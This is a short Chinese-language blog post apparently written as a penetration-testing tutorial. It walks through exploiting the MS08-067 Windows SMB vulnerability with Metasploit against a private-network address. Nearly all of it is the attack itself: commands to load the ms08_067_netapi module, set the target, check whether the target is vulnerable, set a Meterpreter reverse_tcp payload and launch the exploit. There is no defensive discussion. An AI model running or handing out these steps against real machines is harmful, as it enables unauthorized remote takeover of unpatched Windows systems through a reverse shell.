sup3rman 2020-03-26 15:21 原文
以ms08_067为例,判断是否存在
使用msf
msfconsole #进入控制台
use exploit/windows/smb/ms08_067_netapi #使用ms08-067的模块
options #查看所需设置选项
set rhosts 192.168.200.99 #被攻击机IP地址
check #查看目标主机是否能被攻击
如果显示如下信息则不能被攻击
![image image](https://img2020.cnblogs.com/blog/1943028/202003/1943028-20200326152040676-1037038811.png)
确定能存在该漏洞的情况下选择payload
set payload windows/meterpreter/reverse_tcp #设置payload
![image image](https://img2020.cnblogs.com/blog/1943028/202003/1943028-20200326152042029-2108377834.png)
exploit #进行攻击
推荐阅读